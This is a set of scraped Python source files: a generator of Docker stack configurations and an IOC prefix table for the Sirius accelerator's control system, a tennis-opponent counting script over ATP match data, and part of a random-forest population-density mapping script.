'corrs-c134-ia06': ('si-ps-corrs-c134-ia06', ('dips', )),\n 'corrs-c134-ia07': ('si-ps-corrs-c134-ia07', ('dips', )),\n 'corrs-c134-ia08': ('si-ps-corrs-c134-ia08', ('dips', )),\n 'corrs-c134-ia09': ('si-ps-corrs-c134-ia09', ('dips', )),\n 'corrs-c134-ia10': ('si-ps-corrs-c134-ia10', ('dips', )),\n 'corrs-c134-ia11': ('si-ps-corrs-c134-ia11', ('dips', )),\n 'corrs-c134-ia12': ('si-ps-corrs-c134-ia12', ('dips', )),\n 'corrs-c134-ia13': ('si-ps-corrs-c134-ia13', ('dips', )),\n 'corrs-c134-ia14': ('si-ps-corrs-c134-ia14', ('dips', )),\n 'corrs-c134-ia15': ('si-ps-corrs-c134-ia15', ('dips', )),\n 'corrs-c134-ia16': ('si-ps-corrs-c134-ia16', ('dips', )),\n 'corrs-c134-ia17': ('si-ps-corrs-c134-ia17', ('dips', )),\n 'corrs-c134-ia18': ('si-ps-corrs-c134-ia18', ('dips', )),\n 'corrs-c134-ia19': ('si-ps-corrs-c134-ia19', ('dips', )),\n 'corrs-c134-ia20': ('si-ps-corrs-c134-ia20', ('dips', )),\n 'corrs-qs-sb-ia10': ('si-ps-corrs-qs-sb-ia10', ('dips', )),\n 'corrs-sa-ia17': ('si-ps-corrs-sa-ia17', ('dips', 
)),\n 'trims-qs-c1234-ia01': ('si-ps-trims-qs-c1234-ia01', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia02': ('si-ps-trims-qs-c1234-ia02', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia03': ('si-ps-trims-qs-c1234-ia03', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia04': ('si-ps-trims-qs-c1234-ia04', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia05': ('si-ps-trims-qs-c1234-ia05', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia06': ('si-ps-trims-qs-c1234-ia06', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia07': ('si-ps-trims-qs-c1234-ia07', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia08': ('si-ps-trims-qs-c1234-ia08', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia09': ('si-ps-trims-qs-c1234-ia09', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia10': ('si-ps-trims-qs-c1234-ia10', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia11': ('si-ps-trims-qs-c1234-ia11', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia12': ('si-ps-trims-qs-c1234-ia12', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia13': ('si-ps-trims-qs-c1234-ia13', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia14': ('si-ps-trims-qs-c1234-ia14', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia15': ('si-ps-trims-qs-c1234-ia15', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia16': ('si-ps-trims-qs-c1234-ia16', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia17': ('si-ps-trims-qs-c1234-ia17', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia18': ('si-ps-trims-qs-c1234-ia18', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia19': ('si-ps-trims-qs-c1234-ia19', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia20': ('si-ps-trims-qs-c1234-ia20', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia01': ('si-ps-trims-qs-m12-ia01', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia02': ('si-ps-trims-qs-m12-ia02', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia03': ('si-ps-trims-qs-m12-ia03', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia04': ('si-ps-trims-qs-m12-ia04', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia05': ('si-ps-trims-qs-m12-ia05', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia06': ('si-ps-trims-qs-m12-ia06', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia07': ('si-ps-trims-qs-m12-ia07', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia08': ('si-ps-trims-qs-m12-ia08', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia09': ('si-ps-trims-qs-m12-ia09', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia10': ('si-ps-trims-qs-m12-ia10', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia11': ('si-ps-trims-qs-m12-ia11', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia12': ('si-ps-trims-qs-m12-ia12', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia13': ('si-ps-trims-qs-m12-ia13', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia14': ('si-ps-trims-qs-m12-ia14', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia15': ('si-ps-trims-qs-m12-ia15', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia16': ('si-ps-trims-qs-m12-ia16', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia17': ('si-ps-trims-qs-m12-ia17', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia18': ('si-ps-trims-qs-m12-ia18', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia19': ('si-ps-trims-qs-m12-ia19', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia20': ('si-ps-trims-qs-m12-ia20', ('dips', 'quads-qd', 
'quads-qfq')),\n },\n 'si-id': {\n 'epu50': 'si-id-epu50',\n 'conv': ('si-id-conv', ('epu50', )),\n },\n 'it-ps': {\n 'lens': 'it-ps-lens',\n },\n 'si-ps-fastcorrs': {\n 'conv-ia01': 'si-ps-conv-fastcorrs-ia01',\n 'conv-ia02': 'si-ps-conv-fastcorrs-ia02',\n 'conv-ia03': 'si-ps-conv-fastcorrs-ia03',\n 'conv-ia04': 'si-ps-conv-fastcorrs-ia04',\n 'conv-ia05': 'si-ps-conv-fastcorrs-ia05',\n 'conv-ia06': 'si-ps-conv-fastcorrs-ia06',\n 'conv-ia07': 'si-ps-conv-fastcorrs-ia07',\n 'conv-ia08': 'si-ps-conv-fastcorrs-ia08',\n 'conv-ia09': 'si-ps-conv-fastcorrs-ia09',\n 'conv-ia10': 'si-ps-conv-fastcorrs-ia10',\n 'conv-ia11': 'si-ps-conv-fastcorrs-ia11',\n 'conv-ia12': 'si-ps-conv-fastcorrs-ia12',\n 'conv-ia13': 'si-ps-conv-fastcorrs-ia13',\n 'conv-ia14': 'si-ps-conv-fastcorrs-ia14',\n 'conv-ia15': 'si-ps-conv-fastcorrs-ia15',\n 'conv-ia16': 'si-ps-conv-fastcorrs-ia16',\n 'conv-ia17': 'si-ps-conv-fastcorrs-ia17',\n 'conv-ia18': 'si-ps-conv-fastcorrs-ia18',\n 'conv-ia19': 'si-ps-conv-fastcorrs-ia19',\n 'conv-ia20': 'si-ps-conv-fastcorrs-ia20',\n 'diag': 'si-ps-diag-fastcorrs',\n },\n 'si-ap-idff': {\n 'epu50': 'si-ap-idff-epu50',\n 'papu50': 'si-ap-idff-papu50',\n }\n # 'bl-ap-imgproc': {\n # 'imgproc': 'bl-ap-imgproc',\n # },\n }\n\n\nclass DockerStackConfig(ServiceConfig):\n \"\"\"Docker stack configuration.\"\"\"\n\n IMAGE_TAG_CSCONSTS = '__FAC_CSCONSTS_TAG_TEMPLATE__'\n IMAGE_TAG_IOCS = '__FAC_IOC_TAG_TEMPLATE__'\n\n def __init__(self, image_tag):\n self.version = '3.7'\n self.image_tag = image_tag\n self.networks = ['host_network'] if 'CSCONSTS' in image_tag else \\\n ['ioc-network']\n self.replicas = '1'\n self.condition = 'any'\n self.driver = 'json-file'\n\n @staticmethod\n def get_command(app):\n \"\"\"Return command.\"\"\"\n strf = \"bash -c '/ioc-apps/\" + app + \".bash'\"\n return strf\n\n def get_image(self, app):\n \"\"\"Return image.\"\"\"\n if 'CSCONSTS' in self.image_tag:\n image = 'fac-csconsts'\n elif 'li-ps' in app and 'conv' not in app and 'diag' not in app:\n image = 'fac-iocs-li-ps'\n else:\n image = 'fac-iocs'\n strf = 'dockerregistry.lnls-sirius.com.br/fac/' + image + \":\"\n strf += self.image_tag\n return strf\n\n def str_header(self):\n strf = ''\n strf += 'version: \"' + self.version + '\"'\n strf += '\\n'\n strf += '\\n' + 'services:'\n return strf\n\n def str_service(self, app, node, depends=None):\n strf = ''\n strf += '\\n' + ' image: ' + self.get_image(app)\n if depends:\n strf += '\\n' + ' depends_on:'\n for item in depends:\n strf += '\\n' + ' - \"' + item + '\"'\n if 'CSCONSTS' not in self.image_tag:\n strf += '\\n' + ' command: ' + DockerStackConfig.get_command(app)\n strf += '\\n' + ' volumes:'\n strf += '\\n' + ' - \"/storage/common/fac/iocs-log:/home/sirius/iocs-log\"'\n strf += '\\n' + ' deploy:'\n strf += '\\n' + ' placement:'\n strf += '\\n' + ' constraints:'\n strf += '\\n' + ' - node.hostname == ' + node\n strf += '\\n' + ' replicas: ' + self.replicas\n strf += '\\n' + ' restart_policy:'\n strf += '\\n' + ' condition: ' + self.condition\n strf += '\\n' + ' logging:'\n strf += '\\n' + ' driver: ' + '\"' + self.driver + '\"'\n strf += '\\n' + ' options:'\n strf += '\\n' + ' max-file: ' + '\"10\"'\n strf += '\\n' + ' max-size: ' + '\"10m\"'\n strf += '\\n' + ' networks:'\n for network in self.networks:\n strf += '\\n' + ' - ' + network\n return strf\n\n def str_networks(self):\n strf = ''\n strf += '\\n' + 'networks:'\n strf += '\\n' + ' ioc-network' + ':'\n strf += '\\n' + ' external: true'\n strf += '\\n' + ' name: \"host\"'\n return strf\n\n\nclass 
DockerLowStackConfig(DockerStackConfig):\n \"\"\"Docker low stack configuration.\"\"\"\n\n def __init__(self, app, node):\n super().__init__(DockerStackConfig.IMAGE_TAG_IOCS)\n self.app = app\n self.node = node\n\n def __str__(self):\n strf = self.str_header()\n strf += '\\n'\n strf += '\\n' + ' iocs:'\n strf += self.str_service(self.app, self.node)\n strf += '\\n'\n strf += self.str_networks()\n return strf\n\n def save_config_file(self):\n fname = 'docker-stack-' + self.app + '.yml'\n print(self, file=open(fname, 'w'))\n\n\nclass DockerHighStackConfig(DockerStackConfig):\n \"\"\"Docker high stack configuration.\"\"\"\n\n def __init__(self, stack):\n super().__init__(DockerStackConfig.IMAGE_TAG_IOCS)\n self.stack = stack\n self.services = ServiceConfig.STACKS[stack]\n\n def __str__(self):\n strf = self.str_header()\n for service, app in self.services.items():\n if isinstance(app, (tuple, list)):\n app, depends = app\n else:\n depends = None\n # print(service, app, depends)\n node = ServiceConfig.SERVICES[app]\n strf += '\\n'\n strf += '\\n' + ' ' + service + ':'\n strf += self.str_service(app, node, depends)\n strf += '\\n'\n strf += self.str_networks()\n return strf\n\n def save_config_file(self):\n fname = 'docker-stack-' + self.stack + '.yml'\n print(self, file=open(fname, 'w'))\n\n\nclass DockerCSConstsConfig(DockerStackConfig):\n \"\"\"Docker control-system-constants configuration.\"\"\"\n\n def __init__(self, app, node):\n super().__init__(DockerStackConfig.IMAGE_TAG_CSCONSTS)\n self.app = app\n self.node = node\n\n def __str__(self):\n strf = self.str_header()\n strf += '\\n'\n strf += '\\n' + ' facs-csconsts:'\n strf += self.str_service(self.app, self.node)\n strf += '\\n'\n strf += self.str_networks()\n return strf\n\n def save_config_file(self):\n fname = 'docker-stack-' + self.app + '.yml'\n print(self, file=open(fname, 'w'))\n\n def str_networks(self):\n strf = ''\n strf += '\\n' + 'networks:'\n strf += '\\n' + ' host_network' + ':'\n strf += '\\n' + ' external:'\n strf += '\\n' + ' name: \"host\"'\n return strf\n\n\ndef generate_service_files():\n \"\"\"Generate docker service file.\"\"\"\n\n for app, node in ServiceConfig.SERVICES_CSCONSTS.items():\n config = DockerCSConstsConfig(app=app, node=node)\n config.save_config_file()\n\n for app, node in ServiceConfig.SERVICES.items():\n config = DockerLowStackConfig(app=app, node=node)\n config.save_config_file()\n\n for stack in ServiceConfig.STACKS:\n config = DockerHighStackConfig(stack)\n config.save_config_file()\n\n\ndef generate_service_2_ioc_table():\n \"\"\"Generate docker service -> IOCs table.\"\"\"\n\n cont2serv = dict()\n for stack, sub2serv in ServiceConfig.STACKS.items():\n for sub, serv in sub2serv.items():\n if isinstance(serv, (tuple, list)):\n serv = serv[0]\n cont2serv['facs-' + stack + '_' + sub] = serv\n serv2cont = {v: k for k, v in cont2serv.items()}\n\n cont2iocs = dict()\n for service in ServiceConfig.SERVICES:\n if service in serv2cont:\n container = serv2cont[service]\n else:\n container = 'facs-' + service\n\n appdir_path = os.path.join(\n os.path.abspath(os.path.dirname(__file__)), '..', 'apps')\n appfile_path = os.path.join(appdir_path, service + '.bash')\n\n iocs = list()\n with open(appfile_path, 'r') as file:\n text = file.read()\n lines = text.splitlines()\n for lin in lines:\n lin = lin.strip()\n if not lin or lin[0] == '#':\n continue # empty line or comment\n elif '/ioc-logs/sirius-ioc-' in lin:\n if ('-ps' in lin or 'idff' in lin) and 'conv' not in lin:\n iocname = 
lin.split('/bin/sirius-ioc-')[1]\n iocname = iocname.split(' | tee ')[0]\n iocname = iocname.replace('.py', '').replace(' -n', '')\n else:\n iocname = lin.split('/ioc-logs/sirius-ioc-')[1]\n iocname = iocname.split(' &')[0]\n iocname = iocname.split('.log')[0]\n iocs.append(iocname)\n cont2iocs[container] = iocs\n\n data = dict()\n for container, iocs in cont2iocs.items():\n data[container] = dict()\n for ioc in iocs:\n ioc = ioc.strip(' ')\n prefixes = list()\n if ('-ps' in ioc or '-pu' in ioc) and 'conv' not in ioc:\n prs = ioc.replace('\"', '')\n prs = prs.split(' ')\n if prs[0] == 'as-ps':\n psm = PSSearch.conv_bbbname_2_psnames(prs[1])\n prefixes.extend([p[0] for p in psm])\n elif 'diag' in prs[0]:\n if 'ps' in ioc:\n filt = {'sec': prs[1], 'sub': prs[2], 'dev': prs[3]}\n else:\n filt = {\n 'dis': 'PU', 'dev': '.*(Kckr|Sept)',\n 'propty_name': '(?!:CCoil).*'}\n devnames = PSSearch.get_psnames(filt)\n prefixes.extend([p+':Diag' for p in devnames])\n elif prs[0] == 'li-ps':\n prefixes.append(prs[1])\n else:\n prs = ioc.split('-')\n if 'conv' in ioc:\n if 'id' in ioc:\n idnames = IDSearch.get_idnames({'dev': 'APU.*'})\n prefixes.extend([i+':Kx' for i in idnames])\n else:\n if prs[0] == 'li':\n filt = {'sec': 'LI'}\n elif prs[1] == 'pu':\n filt = {'dis': 'PU'}\n elif 'fastcorr' in ioc:\n sub = prs[4][-2:] + '.*'\n filt = {'sec': 'SI', 'sub': sub, 'dev': 'FC.*'}\n psnames = PSSearch.get_psnames(filt)\n for psn in psnames:\n psn = _PVName(psn)\n try:\n magf = PSSearch.conv_psname_2_magfunc(psn)\n strg = util.get_strength_label(magf)\n prefixes.append(str(psn.substitute(\n propty=psn.propty_name+strg)))\n except ValueError:\n pass\n elif 'id' in ioc:\n if 'idff' in ioc:\n idn = ioc.split(' ')[1]\n pref = 'SI-' + _PVName(idn).sub + ':AP-IDFF'\n prefixes.append(pref)\n else:\n iddev = ioc.split('-')[2].upper()\n idnames = IDSearch.get_idnames({'dev': iddev})\n # needs conversion to str to avoid SiriusPVName __str__\n prefixes.extend([str(idname) for idname in idnames])\n elif 'diag' in prs[2]:\n if prs[0] == 'li':\n devs = LIDiagConst.ALL_DEVICES\n prefixes.extend([d+':Diag' for d in devs])\n elif prs[1] == 'rf':\n devs = RFDiagConst.ALL_DEVICES\n prefixes.extend([d+':Diag' for d in devs])\n elif prs[1] == 'ap':\n if prs[2] == 'currinfo':\n if 'lifetime' in ioc or ioc.startswith('bo'):\n pref = prs[0].upper() + '-Glob:AP-CurrInfo'\n prefixes.append(pref)\n else:\n dbs = get_currinfo_database(prs[0].upper())\n devs = {str(_PVName(p).device_name) for p in dbs}\n prefixes.extend(sorted(devs))\n elif prs[0] == 'bl' and prs[2] == 'imgproc':\n bline = prs[3][0:3].upper()\n hutch = 'A' if prs[3][-1] == 1 else 'B'\n cam = 'BASLER01'\n pref = ':'.join([bline, hutch, cam])\n prefixes.append(pref)\n else:\n devname = prs[2][0].upper() + prs[2][1:]\n devname = devname.replace('ang', 'Ang')\n devname = devname.replace('corr', 'Corr')\n devname = devname.replace('shift', 'Shift')\n devname = devname.replace('ctrl', 'Ctrl')\n devname = devname.replace('ofb', 'OFB')\n devname = devname.replace('Stabinfo', 'StabilityInfo')\n devname = devname.replace('Energy', 'MeasEnergy')\n pref = prs[0].upper() + '-Glob:AP-' + devname\n prefixes.append(pref)\n elif prs[1] == 'ti':\n filt = {'sec': prs[0].upper()}\n if len(prs) == 4:\n if prs[3] == 'bpms':\n filt['dev'] = 'BPM(?!-PsMtn).*'\n else:\n idx = prs[3].capitalize().replace('trim', 'Trim')\n filt['idx'] = idx\n devnames = HLTimeSearch.get_hl_triggers(filt)\n else:\n indv = ('Corrs', 'Skews', 'QTrims', 'BPM')\n devnames = [\n t for t in 
HLTimeSearch.get_hl_triggers(filt)\n if not t.endswith(indv)]\n prefixes.extend([str(d) for d in devnames])\n data[container][ioc] = prefixes\n\n fname = 'facs.yml'\n hmsg = '# This is a yml file that was automatically generated by\\n'\n hmsg += '# the generate_service_files.py script, available at the\\n'\n hmsg += '# docker-machine-applications repository.\\n'\n hmsg += '#\\n'\n hmsg += '# It can be imported into python3 code as a dict with:\\n'\n hmsg += '# ```\\n'\n hmsg += '# with open(\"facs.yml\") as file:\\n'\n hmsg += '# data = yaml.load(file)\\n'\n hmsg += '# ```\\n'\n hmsg += '# where `yaml` is a python3 module available in `pip3`.\\n'\n hmsg += '#\\n'\n hmsg += '# The blocks below define the relation:\\n'\n hmsg += '# SERVICE:\\n'\n hmsg += '# IOC_X:\\n'\n hmsg += '# PREFIX_A\\n'\n hmsg += '# PREFIX_B\\n'\n hmsg += '# IOC_Y:\\n'\n hmsg += '# PREFIX_C\\n'\n hmsg += '# ...\\n'\n hmsg += '# where SERVICE is the name of the docker service, IOC_X\\n'\n hmsg += '# and IOC_Y are references to IOC processes running into\\n'\n hmsg += '# the docker container, PREFIX_A and PREFIX_B, for IOC_X,\\n'\n hmsg += '# and PREFIX_C, for IOC_Y, are prefixes of PVs that are\\n'\n hmsg += '# provided by each of the IOCs.\\n\\n'\n\n with open(fname, 'w') as file:\n file.write(hmsg)\n for container, iocs in data.items():\n file.write(yaml.dump({container: iocs}, default_flow_style=False))\n file.write('\\n')\n\n\nif __name__ == \"__main__\":\n generate_service_files()\n generate_service_2_ioc_table()\n","repo_name":"lnls-sirius/docker-machine-applications","sub_path":"tools/generate_service_files.py","file_name":"generate_service_files.py","file_ext":"py","file_size_in_byte":37753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26170403389","text":"import pandas as pd\n\ndef _sum(arr): \n sum=0\n for i in arr: \n sum = sum + i \n return(sum)\n#78 100644 2020\ndataset2018 = pd.read_csv('./data/HC_players_2018.csv')\ndataset2019 = pd.read_csv('./data/HC_players_2019.csv')\ndataset2020 = pd.read_csv('./data/HC_players_2020.csv')\ndatasetAll = pd.read_csv('./data/HC_players_all.csv')\ndf2018 = pd.DataFrame(dataset2018)\ndf2019 = pd.DataFrame(dataset2019)\ndf2020 = pd.DataFrame(dataset2020)\ndfAll = pd.DataFrame(datasetAll)\nplayerCount2018 = []\nplayerCount2019 = []\nplayerCount2020 = []\nplayerCount = []\ndatasetMatches2018 = pd.read_csv('./data/atp_matches_2018.csv')\ndfMatches2018 = pd.DataFrame(datasetMatches2018)\ndatasetMatches2019 = pd.read_csv('./data/atp_matches_2019.csv')\ndfMatches2019 = pd.DataFrame(datasetMatches2019)\ndatasetMatches2020 = pd.read_csv('./data/atp_matches_2020.csv')\ndfMatches2020 = pd.DataFrame(datasetMatches2020)\n#progress = 0\nfor d in df2018.itertuples():\n #progress += 1\n #print(progress)\n playerOpponents2018 = []\n for d2 in dfMatches2018.itertuples():\n if((d[1] == d2[8]) and not (d2[16] in playerOpponents2018)):\n playerOpponents2018.append(d2[16])\n elif (((d[1] == d2[16]) and not (d2[8] in playerOpponents2018))) :\n playerOpponents2018.append(d2[8])\n playerCount2018.append(len(playerOpponents2018))\n#progress = 0\nfor d in df2019.itertuples():\n #progress += 1\n #print(progress)\n playerOpponents2019 = []\n for d2 in dfMatches2019.itertuples():\n if((d[1] == d2[8]) and not (d2[16] in playerOpponents2019)):\n playerOpponents2019.append(d2[16])\n elif (((d[1] == d2[16]) and not (d2[8] in playerOpponents2019))) :\n playerOpponents2019.append(d2[8])\n 
playerCount2019.append(len(playerOpponents2019))\n#progress = 0\nfor d in df2020.itertuples():\n #progress += 1\n #print(progress)\n playerOpponents2020 = []\n for d2 in dfMatches2020.itertuples():\n if((d[1] == d2[8]) and not (d2[16] in playerOpponents2020)):\n playerOpponents2020.append(d2[16])\n elif (((d[1] == d2[16]) and not (d2[8] in playerOpponents2020))) :\n playerOpponents2020.append(d2[8])\n playerCount2020.append(len(playerOpponents2020))\n#progress = 0\nfor d in dfAll.itertuples():\n #progress += 1\n #print(progress)\n playerOpponentsAll = []\n for d2 in dfMatches2018.itertuples():\n if((d[1] == d2[8]) and not (d2[16] in playerOpponentsAll)):\n playerOpponentsAll.append(d2[16])\n elif (((d[1] == d2[16]) and not (d2[8] in playerOpponentsAll))) :\n playerOpponentsAll.append(d2[8])\n for d2 in dfMatches2019.itertuples():\n if((d[1] == d2[8]) and not (d2[16] in playerOpponentsAll)):\n playerOpponentsAll.append(d2[16])\n elif (((d[1] == d2[16]) and not (d2[8] in playerOpponentsAll))) :\n playerOpponentsAll.append(d2[8])\n for d2 in dfMatches2019.itertuples():\n if((d[1] == d2[8]) and not (d2[16] in playerOpponentsAll)):\n playerOpponentsAll.append(d2[16])\n elif (((d[1] == d2[16]) and not (d2[8] in playerOpponentsAll))) :\n playerOpponentsAll.append(d2[8])\n playerCount.append(len(playerOpponentsAll))\nprint('REZULTATI 2018:', _sum(playerCount2018) / len(playerCount2018))\nprint('REZULTATI 2019:', _sum(playerCount2019) / len(playerCount2019))\nprint('REZULTATI 2020:', _sum(playerCount2020) / len(playerCount2020))\nprint('REZULTATI TOTAL:', _sum(playerCount) / len(playerCount))\n","repo_name":"mladen-995/social-network-analysis","sub_path":"scripts/script-one.py","file_name":"script-one.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"23938348987","text":"import pandas as pd\nimport numpy as np\nimport json\nfrom conv import *\nfrom utils import *\nfrom sklearn.ensemble import RandomForestRegressor\n\n\n# 100m\nRESOLUTION = 100\nN_ROW = 1540\nN_COLUMN = 1250\n\n## 200m\n# RESOLUTION = 200\n# N_ROW = 770\n# N_COLUMN = 625\n\n## 500m\n# RESOLUTION = 500\n# N_ROW = 308\n# N_COLUMN = 250\n\nrelative_src = 'resource/feature_vector_of_pixel_grade_proportions_' + str(RESOLUTION) +'.txt'\ncounty_src = r\"resource/wuhanCountyPop.txt\"\nsub_src = r\"resource/wuhanSubDistrictPop.txt\"\nsub_pop = r\"resource/sub_pop.txt\"\nsub_pd = r\"resource/sub_population_density.txt\"\n\nsubPop = pd.read_table(sub_pop,sep=',',index_col='gid')\nsubPop = subPop.sort_index()\n\nsub_pd = pd.read_table(sub_pd,sep=',',index_col='gid')\nsub_pd = sub_pd.sort_index()\n\n\nsubPara_relative = pd.read_table(relative_src,sep=',',index_col='subid')\nsubPara_relative = subPara_relative.sort_index()\n\n\n\n\ngrid_src = r\"..\\Data\\grid\" + str(RESOLUTION) +\".csv\"\ngridInfo = pd.read_table(grid_src,sep=',',index_col='id')\ngridInfo = gridInfo.sort_index()\n\nini_matrix = np.zeros((N_ROW,N_COLUMN))\n\ncountyInfo = pd.read_table(county_src,sep=',',index_col='countyId')\ncounty_dict = countyInfo.to_dict()['countyPopNum']\nsubInfo = pd.read_table(sub_src,sep=',',index_col='subId')\n\nsub_dict = subInfo.to_dict()['subPopNum']\n\nindex_matrix = np.array(gridInfo.index).reshape((N_ROW,N_COLUMN))[::-1]#索引的二维矩阵\ncounty_matrix = np.array(gridInfo['county_id']).reshape((N_ROW,N_COLUMN))[::-1]#countyid的二维矩阵\nsub_matrix = np.array(gridInfo['sub_id']).reshape((N_ROW,N_COLUMN))[::-1]#subid的二维矩阵\nbuilding_area_matrix = 
np.array(gridInfo['building_area']).reshape((N_ROW,N_COLUMN))[::-1]#是否又建筑物的二维矩阵\n\n\nf = open(\"resource/class_\"+ str(RESOLUTION) +\".txt\",'r')\nclasses = json.loads(f.read())\nf.close()\nresult_matrixs =[]\n\n\nfor key,value in classes.items():\n if \"poi\" in key:\n tmp_matrix = np.array(gridInfo['count_'+key.replace('_','')]).reshape((N_ROW,N_COLUMN))[::-1]\n elif \"night\" in key:\n tmp_matrix = np.array(gridInfo['mobile_night']).reshape((N_ROW,N_COLUMN))[::-1]\n\n for i in range(len(value)):\n if i == 0:\n ini_matrix[tmp_matrix == 0] = 1\n elif i == len(value)-1:\n ini_matrix[(tmp_matrix >= int(value[i-1])) & (tmp_matrix <= int(value[i]))] = 1\n else:\n ini_matrix[(tmp_matrix >= int(value[i-1])) & (tmp_matrix < int(value[i]))] = 1\n result_matrixs.append(ini_matrix)\n ini_matrix = np.zeros((N_ROW, N_COLUMN))\n\nfor mat in result_matrixs:\n mat.resize(N_ROW*N_COLUMN,1)\n\n\n\npoi1_matrix = np.array(gridInfo['count_poi1']).reshape((N_ROW,N_COLUMN))[::-1]\npoi2_matrix = np.array(gridInfo['count_poi2']).reshape((N_ROW,N_COLUMN))[::-1]\n\npoi7_matrix = np.array(gridInfo['count_poi7']).reshape((N_ROW,N_COLUMN))[::-1]\npoi8_matrix = np.array(gridInfo['count_poi8']).reshape((N_ROW,N_COLUMN))[::-1]\npoi11_matrix = np.array(gridInfo['count_poi11']).reshape((N_ROW,N_COLUMN))[::-1]\npoi14_matrix = np.array(gridInfo['count_poi14']).reshape((N_ROW,N_COLUMN))[::-1]\npoi21_matrix = np.array(gridInfo['count_poi21']).reshape((N_ROW,N_COLUMN))[::-1]\npoi22_matrix = np.array(gridInfo['count_poi22']).reshape((N_ROW,N_COLUMN))[::-1]\npoi23_matrix = np.array(gridInfo['count_poi23']).reshape((N_ROW,N_COLUMN))[::-1]\npoi24_matrix = np.array(gridInfo['count_poi24']).reshape((N_ROW,N_COLUMN))[::-1]\npoi3_matrix = np.array(gridInfo['count_poi3']).reshape((N_ROW,N_COLUMN))[::-1]\npoi18_matrix = np.array(gridInfo['count_poi18']).reshape((N_ROW,N_COLUMN))[::-1]\npoi_matrix = poi1_matrix+poi2_matrix+poi3_matrix+poi7_matrix+poi8_matrix+poi11_matrix+poi14_matrix+poi18_matrix+poi21_matrix+poi22_matrix+poi23_matrix+poi24_matrix\nnight_point_matrix = np.array(gridInfo['mobile_night']).reshape((N_ROW,N_COLUMN))[::-1]\nnight_point_matrix[np.isnan(night_point_matrix)] = 0\n\n\nnoPoiNoBuilding = ((np.isnan(sub_matrix)==False)&(building_area_matrix == 0) & (poi_matrix ==0))\nnoPoiHasBuilding = ((np.isnan(sub_matrix)==False)&(building_area_matrix > 0) & (poi_matrix ==0))\n\n\n\nwei_matrix = np.sqrt(building_area_matrix)\nmax1 = max(wei_matrix[noPoiHasBuilding])\ntmp1_matrix = np.zeros((N_ROW, N_COLUMN))\ntmp1_matrix += 1\n\n\n\n\n\n\n\ncounty = {11: 0, 18: 0, 15: 0, 14: 0, 12: 0, 6: 0, 10: 0, 3: 0, 1: 0, 16: 0, 4: 0, 5: 0, 7: 0, 9: 0, 8: 0, 17: 0, 2: 0}\nfor i in range(1):\n rfc = RandomForestRegressor(max_features='sqrt',n_estimators=250,min_samples_leaf=1,\n oob_score=True,criterion=\"mse\",bootstrap=True,random_state=i)\n\n rfc.fit(subPara_relative, sub_pd)\n result = rfc.predict(np.hstack(result_matrixs)).reshape((N_ROW,N_COLUMN))\n\n # building patch data\n _ll = list(result[poi_matrix == 0])\n _ll.sort()\n tmp1_matrix[noPoiHasBuilding] = wei_matrix[noPoiHasBuilding] / max1\n tmp1_matrix[noPoiHasBuilding] *= _ll[0]*3\n result[noPoiHasBuilding] = tmp1_matrix[noPoiHasBuilding]\n result[noPoiNoBuilding] = 0\n # #\n\n # mobile positioning data\n x = list(result[poi_matrix > 0])\n x.sort()\n y = list(night_point_matrix[poi_matrix > 0])\n y.sort()\n [rows, cols] = result.shape\n for i in range(rows):\n for j in range(cols):\n if (poi_matrix[i, j] > 0 ):\n index_x = 0\n index_y = 0\n for index, val in enumerate(x):\n if 
